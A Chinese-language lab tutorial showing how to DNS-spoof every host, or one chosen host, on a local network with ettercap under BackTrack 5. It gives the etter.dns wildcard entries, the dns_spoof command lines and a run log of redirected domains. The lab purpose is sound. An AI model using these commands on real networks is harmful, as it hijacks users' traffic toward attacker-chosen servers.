實驗環境 backtrack5 R3
backtrack5 IP地址爲:192.168.1.20
局域放有2臺計算機分別是 192.168.1.102,192.168.1.106,均爲xp機器
進行實驗之前先安裝ettercap軟件,軟件可以在百度搜到或者在51cto搜
安裝完成後需要做一下步驟
1.編輯vim /etc/sysctl.conf文件找到
#net.ipv4.ip_forward=0改爲net.ipv4.ip_forward=1
然後執行sysctl -p這樣就開啓了路由轉發功能。
2.編輯vim /usr/local/share/ettercap/etter.dns文件
在尾部加入下面格式的內容
*.com A 74.125.128.106
*.org A 74.125.128.106
*.com是要欺騙的網站後綴,就是所有已.com結尾的網站,比如比欺騙的用戶輸入www.baidu.com。那麼他就會跳轉到74.125.128.106這個ip地址的網站上面 中間那個A是A記錄,可以根據自己的需求添加跟過的如:cn cc net等或者
*.baidu.com這樣的形式。
然後執行 ettercap -T -q -i eth0 -P dns_spoof // //
-T 是文本模式
-q 是以安靜模式執行
-i 是接口名
-P 要加載的模塊(這裏使用的DNS_SPOOF模塊)
// // 對所有人進行欺騙,不包括自己
但執行完這條命令後 就開始進行欺騙了,
如下:
root@bt:~# ettercap -T -q -i eth0 -P dns_spoof // //
ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:4B:5C:BE 192.168.1.20 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
4 hosts added to the hosts list... //這裏添加4個主機
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
dns_spoof: [www.killdos.com] spoofed to [74.125.128.106]
dns_spoof: [www.microsoft.com] spoofed to [74.125.128.106]
dns_spoof: [www.google.com] spoofed to [74.125.128.106]
dns_spoof: [www.ab.com] spoofed to [74.125.128.106]
dns_spoof: [www.google.com] spoofed to [74.125.128.106]
dns_spoof: [www.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [ssl.gstatic.com] spoofed to [74.125.128.106]
dns_spoof: [accounts.google.com] spoofed to [74.125.128.106]
dns_spoof: [ditu.google.cn] spoofed to [74.125.128.106]
dns_spoof: [drive.google.com] spoofed to [74.125.128.106]
dns_spoof: [mail.google.com] spoofed to [74.125.128.106]
dns_spoof: [news.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [picasaweb.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [play.google.com] spoofed to [74.125.128.106]
dns_spoof: [plus.google.com] spoofed to [74.125.128.106]
dns_spoof: [translate.google.cn] spoofed to [74.125.128.106]
dns_spoof: [video.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [www.blogger.com] spoofed to [74.125.128.106]
dns_spoof: [www.googlesciencefair.com] spoofed to [74.125.128.106]
dns_spoof: [www.youtube.com] spoofed to [74.125.128.106]
這裏我有的74.125.128.106是谷歌網站,所以我輸入任何的地址都會跳轉到谷歌的地址
下面針對單臺電腦進行實驗,停止ettercap,使用ipconfig /fushdns 使電腦恢復正常
然後輸入以下 ettercap -T -q -i eth0 -P dns_spoof /要欺騙的IP/ //
例如:ettercap -T -q -i eth0 -P dns_spoof /192.168.1.105/ //